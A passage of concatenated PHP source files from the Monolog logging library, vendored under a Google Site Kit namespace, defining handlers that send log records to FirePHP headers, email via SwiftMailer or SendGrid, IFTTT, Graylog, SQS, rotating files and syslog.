[$tag]; $this->tag = \array_unique(\array_merge($this->tag, $tag)); } return $this; } protected function write(array $record) : void { $this->send($record["formatted"], static::ENDPOINT_SINGLE); } public function handleBatch(array $records) : void { $level = $this->level; $records = \array_filter($records, function ($record) use($level) { return $record['level'] >= $level; }); if ($records) { $this->send($this->getFormatter()->formatBatch($records), static::ENDPOINT_BATCH); } } protected function send(string $data, string $endpoint) : void { $ch = $this->getCurlHandler($endpoint); $headers = ['Content-Type: application/json']; if (!empty($this->tag)) { $headers[] = 'X-LOGGLY-TAG: ' . \implode(',', $this->tag); } \curl_setopt($ch, \CURLOPT_POSTFIELDS, $data); \curl_setopt($ch, \CURLOPT_HTTPHEADER, $headers); \Google\Site_Kit_Dependencies\Monolog\Handler\Curl\Util::execute($ch, 5, \false); } protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\LogglyFormatter(); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Formatter\WildfireFormatter; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; /** * Simple FirePHP Handler (http://www.firephp.org/), which uses the Wildfire protocol. * * @author Eric Clemmons (@ericclemmons) <eric@uxdriven.com> * * @phpstan-import-type FormattedRecord from AbstractProcessingHandler */ class FirePHPHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { use WebRequestRecognizerTrait; /** * WildFire JSON header message format */ protected const PROTOCOL_URI = 'http://meta.wildfirehq.org/Protocol/JsonStream/0.2'; /** * FirePHP structure for parsing messages & their presentation */ protected const STRUCTURE_URI = 'http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1'; /** * Must reference a "known" plugin, otherwise headers won't display in FirePHP */ protected const PLUGIN_URI = 'http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3'; /** * Header prefix for Wildfire to recognize & parse headers */ protected const HEADER_PREFIX = 'X-Wf'; /** * Whether or not Wildfire vendor-specific headers have been generated & sent yet * @var bool */ protected static $initialized = \false; /** * Shared static message index between potentially multiple handlers * @var int */ protected static $messageIndex = 1; /** @var bool */ protected static $sendHeaders = \true; /** * Base header creation function used by init headers & record headers * * @param array<int|string> $meta Wildfire Plugin, Protocol & Structure Indexes * @param string $message Log message * * @return array<string, string> Complete header string ready for the client as key and message as value * * @phpstan-return non-empty-array<string, string> */ protected function createHeader(array $meta, string $message) : array { $header = \sprintf('%s-%s', static::HEADER_PREFIX, \join('-', $meta)); return [$header => $message]; } /** * Creates message header from record * * @return array<string, string> * * @phpstan-return non-empty-array<string, string> * * @see createHeader() * * @phpstan-param FormattedRecord $record */ protected function createRecordHeader(array $record) : array { // Wildfire is extensible to support multiple protocols & plugins in a single request, // but we're not taking advantage of that (yet), so we're using "1" for simplicity's sake. return $this->createHeader([1, 1, 1, self::$messageIndex++], $record['formatted']); } /** * {@inheritDoc} */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\WildfireFormatter(); } /** * Wildfire initialization headers to enable message parsing * * @see createHeader() * @see sendHeader() * * @return array<string, string> */ protected function getInitHeaders() : array { // Initial payload consists of required headers for Wildfire return \array_merge($this->createHeader(['Protocol', 1], static::PROTOCOL_URI), $this->createHeader([1, 'Structure', 1], static::STRUCTURE_URI), $this->createHeader([1, 'Plugin', 1], static::PLUGIN_URI)); } /** * Send header string to the client */ protected function sendHeader(string $header, string $content) : void { if (!\headers_sent() && self::$sendHeaders) { \header(\sprintf('%s: %s', $header, $content)); } } /** * Creates & sends header for a record, ensuring init headers have been sent prior * * @see sendHeader() * @see sendInitHeaders() */ protected function write(array $record) : void { if (!self::$sendHeaders || !$this->isWebRequest()) { return; } // WildFire-specific headers must be sent prior to any messages if (!self::$initialized) { self::$initialized = \true; self::$sendHeaders = $this->headersAccepted(); if (!self::$sendHeaders) { return; } foreach ($this->getInitHeaders() as $header => $content) { $this->sendHeader($header, $content); } } $header = $this->createRecordHeader($record); if (\trim(\current($header)) !== '') { $this->sendHeader(\key($header), \current($header)); } } /** * Verifies if the headers are accepted by the current user agent */ protected function headersAccepted() : bool { if (!empty($_SERVER['HTTP_USER_AGENT']) && \preg_match('{\\bFirePHP/\\d+\\.\\d+\\b}', $_SERVER['HTTP_USER_AGENT'])) { return \true; } return isset($_SERVER['HTTP_X_FIREPHP_VERSION']); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Utils; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter; use Google\Site_Kit_Dependencies\Swift_Message; use Google\Site_Kit_Dependencies\Swift; /** * SwiftMailerHandler uses Swift_Mailer to send the emails * * @author Gyula Sallai * * @phpstan-import-type Record from \Monolog\Logger * @deprecated Since Monolog 2.6. Use SymfonyMailerHandler instead. */ class SwiftMailerHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\MailHandler { /** @var \Swift_Mailer */ protected $mailer; /** @var Swift_Message|callable(string, Record[]): Swift_Message */ private $messageTemplate; /** * @psalm-param Swift_Message|callable(string, Record[]): Swift_Message $message * * @param \Swift_Mailer $mailer The mailer to use * @param callable|Swift_Message $message An example message for real messages, only the body will be replaced */ public function __construct(\Google\Site_Kit_Dependencies\Swift_Mailer $mailer, $message, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::ERROR, bool $bubble = \true) { parent::__construct($level, $bubble); @\trigger_error('The SwiftMailerHandler is deprecated since Monolog 2.6. Use SymfonyMailerHandler instead.', \E_USER_DEPRECATED); $this->mailer = $mailer; $this->messageTemplate = $message; } /** * {@inheritDoc} */ protected function send(string $content, array $records) : void { $this->mailer->send($this->buildMessage($content, $records)); } /** * Gets the formatter for the Swift_Message subject. * * @param string|null $format The format of the subject */ protected function getSubjectFormatter(?string $format) : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter($format); } /** * Creates instance of Swift_Message to be sent * * @param string $content formatted email body to be sent * @param array $records Log records that formed the content * @return Swift_Message * * @phpstan-param Record[] $records */ protected function buildMessage(string $content, array $records) : \Google\Site_Kit_Dependencies\Swift_Message { $message = null; if ($this->messageTemplate instanceof \Google\Site_Kit_Dependencies\Swift_Message) { $message = clone $this->messageTemplate; $message->generateId(); } elseif (\is_callable($this->messageTemplate)) { $message = ($this->messageTemplate)($content, $records); } if (!$message instanceof \Google\Site_Kit_Dependencies\Swift_Message) { $record = \reset($records); throw new \InvalidArgumentException('Could not resolve message as instance of Swift_Message or a callable returning it' . ($record ? \Google\Site_Kit_Dependencies\Monolog\Utils::getRecordMessageForException($record) : '')); } if ($records) { $subjectFormatter = $this->getSubjectFormatter($message->getSubject()); $message->setSubject($subjectFormatter->format($this->getHighestRecord($records))); } $mime = 'text/plain'; if ($this->isHtmlBody($content)) { $mime = 'text/html'; } $message->setBody($content, $mime); /** @phpstan-ignore-next-line */ if (\version_compare(\Google\Site_Kit_Dependencies\Swift::VERSION, '6.0.0', '>=')) { $message->setDate(new \DateTimeImmutable()); } else { /** @phpstan-ignore-next-line */ $message->setDate(\time()); } return $message; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Utils; /** * IFTTTHandler uses cURL to trigger IFTTT Maker actions * * Register a secret key and trigger/event name at https://ifttt.com/maker * * value1 will be the channel from monolog's Logger constructor, * value2 will be the level name (ERROR, WARNING, ..) * value3 will be the log record's message * * @author Nehal Patel <nehal@nehalpatel.me> */ class IFTTTHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** @var string */ private $eventName; /** @var string */ private $secretKey; /** * @param string $eventName The name of the IFTTT Maker event that should be triggered * @param string $secretKey A valid IFTTT secret key */ public function __construct(string $eventName, string $secretKey, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::ERROR, bool $bubble = \true) { if (!\extension_loaded('curl')) { throw new \Google\Site_Kit_Dependencies\Monolog\Handler\MissingExtensionException('The curl extension is needed to use the IFTTTHandler'); } $this->eventName = $eventName; $this->secretKey = $secretKey; parent::__construct($level, $bubble); } /** * {@inheritDoc} */ public function write(array $record) : void { $postData = ["value1" => $record["channel"], "value2" => $record["level_name"], "value3" => $record["message"]]; $postString = \Google\Site_Kit_Dependencies\Monolog\Utils::jsonEncode($postData); $ch = \curl_init(); \curl_setopt($ch, \CURLOPT_URL, "https://maker.ifttt.com/trigger/" . $this->eventName . "/with/key/" . $this->secretKey); \curl_setopt($ch, \CURLOPT_POST, \true); \curl_setopt($ch, \CURLOPT_RETURNTRANSFER, \true); \curl_setopt($ch, \CURLOPT_POSTFIELDS, $postString); \curl_setopt($ch, \CURLOPT_HTTPHEADER, ["Content-Type: application/json"]); \Google\Site_Kit_Dependencies\Monolog\Handler\Curl\Util::execute($ch); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; /** * Base Handler class providing the Handler structure, including processors and formatters * * Classes extending it should (in most cases) only implement write($record) * * @author Jordi Boggiano <j.boggiano@seld.be> * @author Christophe Coevoet <stof@notk.org> * * @phpstan-import-type LevelName from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type Record from \Monolog\Logger * @phpstan-type FormattedRecord array{message: string, context: mixed[], level: Level, level_name: LevelName, channel: string, datetime: \DateTimeImmutable, extra: mixed[], formatted: mixed} */ abstract class AbstractProcessingHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractHandler implements \Google\Site_Kit_Dependencies\Monolog\Handler\ProcessableHandlerInterface, \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface { use ProcessableHandlerTrait; use FormattableHandlerTrait; /** * {@inheritDoc} */ public function handle(array $record) : bool { if (!$this->isHandling($record)) { return \false; } if ($this->processors) { /** @var Record $record */ $record = $this->processRecord($record); } $record['formatted'] = $this->getFormatter()->format($record); $this->write($record); return \false === $this->bubble; } /** * Writes the record down to the log of the implementing handler * * @phpstan-param FormattedRecord $record */ protected abstract function write(array $record) : void; /** * @return void */ public function reset() { parent::reset(); $this->resetProcessors(); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Gelf\PublisherInterface; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Formatter\GelfMessageFormatter; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; /** * Handler to send messages to a Graylog2 (http://www.graylog2.org) server * * @author Matt Lehner <mlehner@gmail.com> * @author Benjamin Zikarsky <benjamin@zikarsky.de> */ class GelfHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** * @var PublisherInterface the publisher object that sends the message to the server */ protected $publisher; /** * @param PublisherInterface $publisher a gelf publisher object */ public function __construct(\Google\Site_Kit_Dependencies\Gelf\PublisherInterface $publisher, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true) { parent::__construct($level, $bubble); $this->publisher = $publisher; } /** * {@inheritDoc} */ protected function write(array $record) : void { $this->publisher->publish($record['formatted']); } /** * {@inheritDoc} */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\GelfMessageFormatter(); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use InvalidArgumentException; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Utils; /** * Stores logs to files that are rotated every day and a limited number of files are kept. * * This rotation is only intended to be used as a workaround. Using logrotate to * handle the rotation is strongly encouraged when you can use it. * * @author Christophe Coevoet <stof@notk.org> * @author Jordi Boggiano <j.boggiano@seld.be> */ class RotatingFileHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\StreamHandler { public const FILE_PER_DAY = 'Y-m-d'; public const FILE_PER_MONTH = 'Y-m'; public const FILE_PER_YEAR = 'Y'; /** @var string */ protected $filename; /** @var int */ protected $maxFiles; /** @var bool */ protected $mustRotate; /** @var \DateTimeImmutable */ protected $nextRotation; /** @var string */ protected $filenameFormat; /** @var string */ protected $dateFormat; /** * @param string $filename * @param int $maxFiles The maximal amount of files to keep (0 means unlimited) * @param int|null $filePermission Optional file permissions (default (0644) are only for owner read/write) * @param bool $useLocking Try to lock log file before doing any writes */ public function __construct(string $filename, int $maxFiles = 0, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true, ?int $filePermission = null, bool $useLocking = \false) { $this->filename = \Google\Site_Kit_Dependencies\Monolog\Utils::canonicalizePath($filename); $this->maxFiles = $maxFiles; $this->nextRotation = new \DateTimeImmutable('tomorrow'); $this->filenameFormat = '{filename}-{date}'; $this->dateFormat = static::FILE_PER_DAY; parent::__construct($this->getTimedFilename(), $level, $bubble, $filePermission, $useLocking); } /** * {@inheritDoc} */ public function close() : void { parent::close(); if (\true === $this->mustRotate) { $this->rotate(); } } /** * {@inheritDoc} */ public function reset() { parent::reset(); if (\true === $this->mustRotate) { $this->rotate(); } } public function setFilenameFormat(string $filenameFormat, string $dateFormat) : self { if (!\preg_match('{^[Yy](([/_.-]?m)([/_.-]?d)?)?$}', $dateFormat)) { throw new \InvalidArgumentException('Invalid date format - format must be one of ' . 'RotatingFileHandler::FILE_PER_DAY ("Y-m-d"), RotatingFileHandler::FILE_PER_MONTH ("Y-m") ' . 'or RotatingFileHandler::FILE_PER_YEAR ("Y"), or you can set one of the ' . 'date formats using slashes, underscores and/or dots instead of dashes.'); } if (\substr_count($filenameFormat, '{date}') === 0) { throw new \InvalidArgumentException('Invalid filename format - format must contain at least `{date}`, because otherwise rotating is impossible.'); } $this->filenameFormat = $filenameFormat; $this->dateFormat = $dateFormat; $this->url = $this->getTimedFilename(); $this->close(); return $this; } /** * {@inheritDoc} */ protected function write(array $record) : void { // on the first record written, if the log is new, we rotate (once per day) after the log has been written so that the new file exists if (null === $this->mustRotate) { $this->mustRotate = null === $this->url || !\file_exists($this->url); } // if the next rotation is expired, then we rotate immediately if ($this->nextRotation <= $record['datetime']) { $this->mustRotate = \true; $this->close(); // triggers rotation } parent::write($record); if ($this->mustRotate) { $this->close(); // triggers rotation } } /** * Rotates the files. */ protected function rotate() : void { // update filename $this->url = $this->getTimedFilename(); $this->nextRotation = new \DateTimeImmutable('tomorrow'); $this->mustRotate = \false; // skip GC of old logs if files are unlimited if (0 === $this->maxFiles) { return; } $logFiles = \glob($this->getGlobPattern()); if (\false === $logFiles) { // failed to glob return; } if ($this->maxFiles >= \count($logFiles)) { // no files to remove return; } // Sorting the files by name to remove the older ones \usort($logFiles, function ($a, $b) { return \strcmp($b, $a); }); foreach (\array_slice($logFiles, $this->maxFiles) as $file) { if (\is_writable($file)) { // suppress errors here as unlink() might fail if two processes // are cleaning up/rotating at the same time \set_error_handler(function (int $errno, string $errstr, string $errfile, int $errline) : bool { return \false; }); \unlink($file); \restore_error_handler(); } } } protected function getTimedFilename() : string { $fileInfo = \pathinfo($this->filename); $timedFilename = \str_replace(['{filename}', '{date}'], [$fileInfo['filename'], \date($this->dateFormat)], $fileInfo['dirname'] . '/' . $this->filenameFormat); if (isset($fileInfo['extension'])) { $timedFilename .= '.' . $fileInfo['extension']; } return $timedFilename; } protected function getGlobPattern() : string { $fileInfo = \pathinfo($this->filename); $glob = \str_replace(['{filename}', '{date}'], [$fileInfo['filename'], \str_replace(['Y', 'y', 'm', 'd'], ['[0-9][0-9][0-9][0-9]', '[0-9][0-9]', '[0-9][0-9]', '[0-9][0-9]'], $this->dateFormat)], $fileInfo['dirname'] . '/' . $this->filenameFormat); if (isset($fileInfo['extension'])) { $glob .= '.' . $fileInfo['extension']; } return $glob; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Throwable; /** * Forwards records to at most one handler * * If a handler fails, the exception is suppressed and the record is forwarded to the next handler. * * As soon as one handler handles a record successfully, the handling stops there. * * @phpstan-import-type Record from \Monolog\Logger */ class FallbackGroupHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\GroupHandler { /** * {@inheritDoc} */ public function handle(array $record) : bool { if ($this->processors) { /** @var Record $record */ $record = $this->processRecord($record); } foreach ($this->handlers as $handler) { try { $handler->handle($record); break; } catch (\Throwable $e) { // What throwable? } } return \false === $this->bubble; } /** * {@inheritDoc} */ public function handleBatch(array $records) : void { if ($this->processors) { $processed = []; foreach ($records as $record) { $processed[] = $this->processRecord($record); } /** @var Record[] $records */ $records = $processed; } foreach ($this->handlers as $handler) { try { $handler->handleBatch($records); break; } catch (\Throwable $e) { // What throwable? } } } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\ResettableInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Psr\Log\LogLevel; /** * Simple handler wrapper that filters records based on a list of levels * * It can be configured with an exact list of levels to allow, or a min/max level. * * @author Hennadiy Verkh * @author Jordi Boggiano <j.boggiano@seld.be> * * @phpstan-import-type Record from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class FilterHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\Handler implements \Google\Site_Kit_Dependencies\Monolog\Handler\ProcessableHandlerInterface, \Google\Site_Kit_Dependencies\Monolog\ResettableInterface, \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface { use ProcessableHandlerTrait; /** * Handler or factory callable($record, $this) * * @var callable|HandlerInterface * @phpstan-var callable(?Record, HandlerInterface): HandlerInterface|HandlerInterface */ protected $handler; /** * Minimum level for logs that are passed to handler * * @var int[] * @phpstan-var array<Level, int> */ protected $acceptedLevels; /** * Whether the messages that are handled can bubble up the stack or not * * @var bool */ protected $bubble; /** * @psalm-param HandlerInterface|callable(?Record, HandlerInterface): HandlerInterface $handler * * @param callable|HandlerInterface $handler Handler or factory callable($record|null, $filterHandler). * @param int|array $minLevelOrList A list of levels to accept or a minimum level if maxLevel is provided * @param int|string $maxLevel Maximum level to accept, only used if $minLevelOrList is not an array * @param bool $bubble Whether the messages that are handled can bubble up the stack or not * * @phpstan-param Level|LevelName|LogLevel::*|array<Level|LevelName|LogLevel::*> $minLevelOrList * @phpstan-param Level|LevelName|LogLevel::* $maxLevel */ public function __construct($handler, $minLevelOrList = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, $maxLevel = \Google\Site_Kit_Dependencies\Monolog\Logger::EMERGENCY, bool $bubble = \true) { $this->handler = $handler; $this->bubble = $bubble; $this->setAcceptedLevels($minLevelOrList, $maxLevel); if (!$this->handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface && !\is_callable($this->handler)) { throw new \RuntimeException("The given handler (" . \json_encode($this->handler) . ") is not a callable nor a Monolog\\Handler\\HandlerInterface object"); } } /** * @phpstan-return array<int, Level> */ public function getAcceptedLevels() : array { return \array_flip($this->acceptedLevels); } /** * @param int|string|array $minLevelOrList A list of levels to accept or a minimum level or level name if maxLevel is provided * @param int|string $maxLevel Maximum level or level name to accept, only used if $minLevelOrList is not an array * * @phpstan-param Level|LevelName|LogLevel::*|array<Level|LevelName|LogLevel::*> $minLevelOrList * @phpstan-param Level|LevelName|LogLevel::* $maxLevel */ public function setAcceptedLevels($minLevelOrList = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, $maxLevel = \Google\Site_Kit_Dependencies\Monolog\Logger::EMERGENCY) : self { if (\is_array($minLevelOrList)) { $acceptedLevels = \array_map('Monolog\\Logger::toMonologLevel', $minLevelOrList); } else { $minLevelOrList = \Google\Site_Kit_Dependencies\Monolog\Logger::toMonologLevel($minLevelOrList); $maxLevel = \Google\Site_Kit_Dependencies\Monolog\Logger::toMonologLevel($maxLevel); $acceptedLevels = \array_values(\array_filter(\Google\Site_Kit_Dependencies\Monolog\Logger::getLevels(), function ($level) use($minLevelOrList, $maxLevel) { return $level >= $minLevelOrList && $level <= $maxLevel; })); } $this->acceptedLevels = \array_flip($acceptedLevels); return $this; } /** * {@inheritDoc} */ public function isHandling(array $record) : bool { return isset($this->acceptedLevels[$record['level']]); } /** * {@inheritDoc} */ public function handle(array $record) : bool { if (!$this->isHandling($record)) { return \false; } if ($this->processors) { /** @var Record $record */ $record = $this->processRecord($record); } $this->getHandler($record)->handle($record); return \false === $this->bubble; } /** * {@inheritDoc} */ public function handleBatch(array $records) : void { $filtered = []; foreach ($records as $record) { if ($this->isHandling($record)) { $filtered[] = $record; } } if (\count($filtered) > 0) { $this->getHandler($filtered[\count($filtered) - 1])->handleBatch($filtered); } } /** * Return the nested handler * * If the handler was provided as a factory callable, this will trigger the handler's instantiation. * * @return HandlerInterface * * @phpstan-param Record $record */ public function getHandler(?array $record = null) { if (!$this->handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface) { $this->handler = ($this->handler)($record, $this); if (!$this->handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface) { throw new \RuntimeException("The factory callable should return a HandlerInterface"); } } return $this->handler; } /** * {@inheritDoc} */ public function setFormatter(\Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface $formatter) : \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface { $handler = $this->getHandler(); if ($handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface) { $handler->setFormatter($formatter); return $this; } throw new \UnexpectedValueException('The nested handler of type ' . \get_class($handler) . ' does not support formatters.'); } /** * {@inheritDoc} */ public function getFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { $handler = $this->getHandler(); if ($handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface) { return $handler->getFormatter(); } throw new \UnexpectedValueException('The nested handler of type ' . \get_class($handler) . ' does not support formatters.'); } public function reset() { $this->resetProcessors(); if ($this->getHandler() instanceof \Google\Site_Kit_Dependencies\Monolog\ResettableInterface) { $this->getHandler()->reset(); } } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; /** * SendGridrHandler uses the SendGrid API v2 function to send Log emails, more information in https://sendgrid.com/docs/API_Reference/Web_API/mail.html * * @author Ricardo Fontanelli <ricardo.fontanelli@hotmail.com> */ class SendGridHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\MailHandler { /** * The SendGrid API User * @var string */ protected $apiUser; /** * The SendGrid API Key * @var string */ protected $apiKey; /** * The email addresses to which the message will be sent * @var string */ protected $from; /** * The email addresses to which the message will be sent * @var string[] */ protected $to; /** * The subject of the email * @var string */ protected $subject; /** * @param string $apiUser The SendGrid API User * @param string $apiKey The SendGrid API Key * @param string $from The sender of the email * @param string|string[] $to The recipients of the email * @param string $subject The subject of the mail */ public function __construct(string $apiUser, string $apiKey, string $from, $to, string $subject, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::ERROR, bool $bubble = \true) { if (!\extension_loaded('curl')) { throw new \Google\Site_Kit_Dependencies\Monolog\Handler\MissingExtensionException('The curl extension is needed to use the SendGridHandler'); } parent::__construct($level, $bubble); $this->apiUser = $apiUser; $this->apiKey = $apiKey; $this->from = $from; $this->to = (array) $to; $this->subject = $subject; } /** * {@inheritDoc} */ protected function send(string $content, array $records) : void { $message = []; $message['api_user'] = $this->apiUser; $message['api_key'] = $this->apiKey; $message['from'] = $this->from; foreach ($this->to as $recipient) { $message['to[]'] = $recipient; } $message['subject'] = $this->subject; $message['date'] = \date('r'); if ($this->isHtmlBody($content)) { $message['html'] = $content; } else { $message['text'] = $content; } $ch = \curl_init(); \curl_setopt($ch, \CURLOPT_URL, 'https://api.sendgrid.com/api/mail.send.json'); \curl_setopt($ch, \CURLOPT_POST, 1); \curl_setopt($ch, \CURLOPT_RETURNTRANSFER, 1); \curl_setopt($ch, \CURLOPT_POSTFIELDS, \http_build_query($message)); \Google\Site_Kit_Dependencies\Monolog\Handler\Curl\Util::execute($ch, 2); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Aws\Sqs\SqsClient; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Utils; /** * Writes to any sqs queue. * * @author Martijn van Calker <git@amvc.nl> */ class SqsHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** 256 KB in bytes - maximum message size in SQS */ protected const MAX_MESSAGE_SIZE = 262144; /** 100 KB in bytes - head message size for new error log */ protected const HEAD_MESSAGE_SIZE = 102400; /** @var SqsClient */ private $client; /** @var string */ private $queueUrl; public function __construct(\Google\Site_Kit_Dependencies\Aws\Sqs\SqsClient $sqsClient, string $queueUrl, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true) { parent::__construct($level, $bubble); $this->client = $sqsClient; $this->queueUrl = $queueUrl; } /** * {@inheritDoc} */ protected function write(array $record) : void { if (!isset($record['formatted']) || 'string' !== \gettype($record['formatted'])) { throw new \InvalidArgumentException('SqsHandler accepts only formatted records as a string' . \Google\Site_Kit_Dependencies\Monolog\Utils::getRecordMessageForException($record)); } $messageBody = $record['formatted']; if (\strlen($messageBody) >= static::MAX_MESSAGE_SIZE) { $messageBody = \Google\Site_Kit_Dependencies\Monolog\Utils::substr($messageBody, 0, static::HEAD_MESSAGE_SIZE); } $this->client->sendMessage(['QueueUrl' => $this->queueUrl, 'MessageBody' => $messageBody]); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter; /** * Common syslog functionality * * @phpstan-import-type Level from \Monolog\Logger */ abstract class AbstractSyslogHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** @var int */ protected $facility; /** * Translates Monolog log levels to syslog log priorities. * @var array * @phpstan-var array<Level, int> */ protected $logLevels = [\Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG => \LOG_DEBUG, \Google\Site_Kit_Dependencies\Monolog\Logger::INFO => \LOG_INFO, \Google\Site_Kit_Dependencies\Monolog\Logger::NOTICE => \LOG_NOTICE, \Google\Site_Kit_Dependencies\Monolog\Logger::WARNING => \LOG_WARNING, \Google\Site_Kit_Dependencies\Monolog\Logger::ERROR => \LOG_ERR, \Google\Site_Kit_Dependencies\Monolog\Logger::CRITICAL => \LOG_CRIT, \Google\Site_Kit_Dependencies\Monolog\Logger::ALERT => \LOG_ALERT, \Google\Site_Kit_Dependencies\Monolog\Logger::EMERGENCY => \LOG_EMERG]; /** * List of valid log facility names. * @var array<string, int> */ protected $facilities = ['auth' => \LOG_AUTH, 'authpriv' => \LOG_AUTHPRIV, 'cron' => \LOG_CRON, 'daemon' => \LOG_DAEMON, 'kern' => \LOG_KERN, 'lpr' => \LOG_LPR, 'mail' => \LOG_MAIL, 'news' => \LOG_NEWS, 'syslog' => \LOG_SYSLOG, 'user' => \LOG_USER, 'uucp' => \LOG_UUCP]; /** * @param string|int $facility Either one of the names of the keys in $this->facilities, or a LOG_* facility constant */ public function __construct($facility = \LOG_USER, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true) { parent::__construct($level, 